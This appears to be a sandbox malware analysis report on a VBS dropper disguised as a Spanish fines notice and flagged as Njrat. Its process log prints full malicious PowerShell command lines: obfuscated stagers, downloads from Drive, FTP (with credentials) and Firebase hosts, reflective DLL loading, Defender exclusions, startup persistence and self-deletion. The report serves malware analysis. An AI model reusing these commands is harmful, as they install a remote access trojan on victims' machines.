QAkADsAJwA9AGQAaQAmAGQAYQBvAGwAbgB3AG8AZAA9AHQAcgBvAHAAeABlAD8AYwB1AC8AbQBvAGMALgBlAGwAZwBvAG8AZwAuAGUAdgBpAHIAZAAvAC8AOgBzAHAAdAB0AGgAJwAgAD0AIABvAHgASwBV???GcAJAA7ACkAIAAnAHUAcwBtAC4AbgBpAHcAcABVAFwAJwAgACsAIABOAEoAVAB4AEQAJAAgACgAIABsAGUAZAA7ACkAKABoAHQAYQBQAHAAbQBlAFQAdABlAEcAOgA6AF0AaAB0AGEAUAAuAE8ASQAuAG0AZQB0AHMAeQBTAFsAIAA9ACAATgBKAFQAeABEACQAewAgACkAIABQAGIAbgBFAFoAJAAgACgAIABmAGkAOwAgACkAMgAoAHMAbABhAHUAcQBFAC4AcgBvAGoAYQBNAC4AbgBvAGkAcwByAGUAVgAuAHQAcwBvAGgAJAAgAD0AIABQAGIAbgBFAFoAJAAgADsA';$kahlN = $qKKzc.replace('???' , 'A') ;$vQpeD = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $kahlN ) ); $vQpeD = $vQpeD[-1..-$vQpeD.Length] -join '';$vQpeD = $vQpeD.replace('%XRqhI%','C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs');powershell $vQpeD
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:17:41:59
                                                            Start date:24/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:17:42:01
                                                            Start date:24/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};"
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:17:42:06
                                                            Start date:24/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:17:42:06
                                                            Start date:24/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000006.00000002.2195084850.000001F542643000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:17:42:06
                                                            Start date:24/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\"
                                                            Imagebase:0x7ff73a0f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:8
                                                            Start time:17:42:08
                                                            Start date:24/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:17:42:10
                                                            Start date:24/09/2024
                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                            Imagebase:0x7ff6ef0c0000
                                                            File size:496'640 bytes
                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                            Has elevated privileges:true
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:17:42:13
                                                            Start date:24/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1"
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 0000000C.00000002.2263158349.0000020A2AA0C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 0000000C.00000002.2263158349.0000020A2A709000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:13
                                                            Start time:17:42:13
                                                            Start date:24/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:cmd.exe /c del "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs"
                                                            Imagebase:0x7ff73a0f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:15
                                                            Start time:17:42:16
                                                            Start date:24/09/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                            Imagebase:0x620000
                                                            File size:65'440 bytes
                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 0000000F.00000002.3000375928.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Has exited:true

                                                            Target ID:16
                                                            Start time:17:42:23
                                                            Start date:24/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
                                                            Imagebase:0x7ff73a0f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:17
                                                            Start time:17:42:23
                                                            Start date:24/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:18
                                                            Start time:17:42:23
                                                            Start date:24/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000012.00000002.2358188672.000002078FFB6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000012.00000002.2358188672.000002078FC86000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Has exited:true

                                                            Target ID:19
                                                            Start time:17:42:23
                                                            Start date:24/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:20
                                                            Start time:17:42:24
                                                            Start date:24/09/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                            Imagebase:0xf40000
                                                            File size:65'440 bytes
                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000014.00000002.2386362117.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            Has exited:true

                                                            Target ID:21
                                                            Start time:17:42:31
                                                            Start date:24/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
                                                            Imagebase:0x7ff73a0f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:22
                                                            Start time:17:42:31
                                                            Start date:24/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:23
                                                            Start time:17:42:31
                                                            Start date:24/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000017.00000002.2442574542.0000020959177000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000017.00000002.2442574542.0000020958E27000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Has exited:true

                                                            Target ID:24
                                                            Start time:17:42:31
                                                            Start date:24/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:25
                                                            Start time:17:42:33
                                                            Start date:24/09/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                            Imagebase:0x840000
                                                            File size:65'440 bytes
                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:27
                                                            Start time:17:43:30
                                                            Start date:24/09/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd.exe /C Y /N /D Y /T 1 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:28
                                                            Start time:17:43:30
                                                            Start date:24/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Reset < >
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3006295703.00007FF848C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ff848c90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9917f3665b61f1b4cf24688b0974a73972e94ae79d024ecab79b6f9db2d56c36
                                                              • Instruction ID: fbe431e4cef9728dab6b05085cac60df7319f6ca3f997b96beb1acf0cef531e4
                                                              • Opcode Fuzzy Hash: 9917f3665b61f1b4cf24688b0974a73972e94ae79d024ecab79b6f9db2d56c36
                                                              • Instruction Fuzzy Hash: 3A01677111CB0D8FD744EF0CE451AA5B7E0FB99364F10056DE58AC3651D736E881CB45
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: _
                                                              • API String ID: 0-701932520
                                                              • Opcode ID: e31c7d432e354b5e3231121cc88aa3f9cee536d25b7af28a7b72957ed9672f65
                                                              • Instruction ID: a3a7bd66edf93488f1b7aff8f8f0de10ebc98f3506c9a36d18fef93cb7ef2a4c
                                                              • Opcode Fuzzy Hash: e31c7d432e354b5e3231121cc88aa3f9cee536d25b7af28a7b72957ed9672f65
                                                              • Instruction Fuzzy Hash: 04E1B231A0CA4D8FDB89EF5CC445AA97BE1FF69351F14416AD409D7296CB38EC82CB81
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2918907773.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848d50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8bb2687b628361fc0968959f3018a37bff64f4ed9b1670de6061031409acbcb7
                                                              • Instruction ID: b8cff2e18b0cfcf4d0649c15d8d6dcd3a01a67d29002069ec03bc983573fb8a2
                                                              • Opcode Fuzzy Hash: 8bb2687b628361fc0968959f3018a37bff64f4ed9b1670de6061031409acbcb7
                                                              • Instruction Fuzzy Hash: 10F12431A0FBC54FE75AAB289855671BBE1EF5A254F1801FFD048CB193DE189C0AC396
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2918907773.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848d50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e616f2c71cc1f5d263479b0827dbaafff325b25b876807ee20915a650cba3174
                                                              • Instruction ID: 697d1be451afea7ee7fed170ec3c7145bf0539f7b313a7e4f5cd5f06d0d60d6b
                                                              • Opcode Fuzzy Hash: e616f2c71cc1f5d263479b0827dbaafff325b25b876807ee20915a650cba3174
                                                              • Instruction Fuzzy Hash: 97B11731D1FB894FE75AAA2C58562B4BBE1EF47260F4801FFD449C7193DA189C0A8396
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f0a2ceb5d79d2ab0443af2de9cda9a40c16b5b4faec7c194ef7d5f4da9f77be0
                                                              • Instruction ID: 5b792b2a33446fe4177cc3db52b37407a5b2fbce9470d0659549f3e304334885
                                                              • Opcode Fuzzy Hash: f0a2ceb5d79d2ab0443af2de9cda9a40c16b5b4faec7c194ef7d5f4da9f77be0
                                                              • Instruction Fuzzy Hash: 45B13931A5DA494FE789EB38846667537E2EF8A340F5041BAD40EC72E3DF286C45CB91
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2918907773.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848d50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 692be26251812cfd625ae60f37631e2c2b7b189b28327aae777ebf7331e3d292
                                                              • Instruction ID: 21167acabe32856d0535b9d36e2bae94d3681fce1f59a3eead24355464e1982a
                                                              • Opcode Fuzzy Hash: 692be26251812cfd625ae60f37631e2c2b7b189b28327aae777ebf7331e3d292
                                                              • Instruction Fuzzy Hash: C461E622E1FE864FFB99BA2C14653B9A6D1EF556A0F4801BBD00EC71D7DE089C0D8359
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2918907773.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848d50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0dacfa9fe234d2c07ee4bd2dff718a714d1d0d1823399bc30007aff59be2c912
                                                              • Instruction ID: 4e0e7bced94d9dbca0245269c36453fe538f2bdfc195158cb1767d9ee686bdb0
                                                              • Opcode Fuzzy Hash: 0dacfa9fe234d2c07ee4bd2dff718a714d1d0d1823399bc30007aff59be2c912
                                                              • Instruction Fuzzy Hash: 1D51E522E1FE864FFB99AA2C1465379A6D1EF556A1F5800BBD00EC71C7DE08AC0D8356
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3f465a88a5466da254b27fc537e751ac13bbb4558f513bc825f9b5dc763c2481
                                                              • Instruction ID: 4221184ecb17a0b831ce3e75d2a47905c9c57fee60c0bd58553fb402f6ea8e34
                                                              • Opcode Fuzzy Hash: 3f465a88a5466da254b27fc537e751ac13bbb4558f513bc825f9b5dc763c2481
                                                              • Instruction Fuzzy Hash: C951D13075DA499FE788E639846233537E2EF8A385F10047DD95EC76D2DF2DA8028B25
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bfb5f01b72a7867afdf57f6766532c46ee0c99fc3d1e4ef7f0c2f401e1598b2a
                                                              • Instruction ID: 87ed76784c96767acc78add4ebd139ceff4b41d55127817b81e0c01d957568a3
                                                              • Opcode Fuzzy Hash: bfb5f01b72a7867afdf57f6766532c46ee0c99fc3d1e4ef7f0c2f401e1598b2a
                                                              • Instruction Fuzzy Hash: D541C720B2DD465FE7D9F728402627532E2EF99781F9400BAD40EC72D3DE18AC458B56
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2918907773.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848d50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 62cbe67dffe9492ae510752cca703b9c1e268dfbc8d7f046f1f0311401eb3c30
                                                              • Instruction ID: b30877888a30f6a5367c3e6eaa566065ec4e0679c25302ce4f0a7245702f5e0c
                                                              • Opcode Fuzzy Hash: 62cbe67dffe9492ae510752cca703b9c1e268dfbc8d7f046f1f0311401eb3c30
                                                              • Instruction Fuzzy Hash: 5041C122E1FA874FF69ABA281465378A6D1EF952E0F5801BBD40EC31D7DE0C9C4D4259
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2918907773.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848d50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 58b14e8e140292e6fb035e6672b63413783664a1b594ca1911e121070ff0b2e2
                                                              • Instruction ID: 7ce364dd2c381905ff5b6d7585711c3b6dae56a8079480cce5d75da1f37323b5
                                                              • Opcode Fuzzy Hash: 58b14e8e140292e6fb035e6672b63413783664a1b594ca1911e121070ff0b2e2
                                                              • Instruction Fuzzy Hash: 9031A462E1FA874FFB99BA281469378A5D1EF556A2F4800BBD40EC31D3DE0C9C4C435A
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2918907773.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848d50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fc22cee69a4739172e1c6ca51ea36d58c6a40b0f34a3b6343348e5b4ac62ff2a
                                                              • Instruction ID: cdab5bdb836eb3cd80d3ee0fa700ecbc7220b0dfe0645a626f6108e026bc1368
                                                              • Opcode Fuzzy Hash: fc22cee69a4739172e1c6ca51ea36d58c6a40b0f34a3b6343348e5b4ac62ff2a
                                                              • Instruction Fuzzy Hash: 0921FC72F1FA494FE7ADAA1C6855278B6D1EF86655F8803BFC04EC3192DF189C094349
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2e44d841230b688f28d5adf97ce70d1fcad0267ec8ee7455c8f7a96153136fe2
                                                              • Instruction ID: 299a912c227ff225312115dc464830ca807ecac49e0e1ae0ed8e96fa457ed136
                                                              • Opcode Fuzzy Hash: 2e44d841230b688f28d5adf97ce70d1fcad0267ec8ee7455c8f7a96153136fe2
                                                              • Instruction Fuzzy Hash: 8221E930B19A0D8FE798EB78C85977872E2FF89745B4040B9940ECB2A6DE39AC418700
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9d58a3984f0f91b11b7cdf5ead418d16964d4ea6485d86e7defa8a77464ea3d3
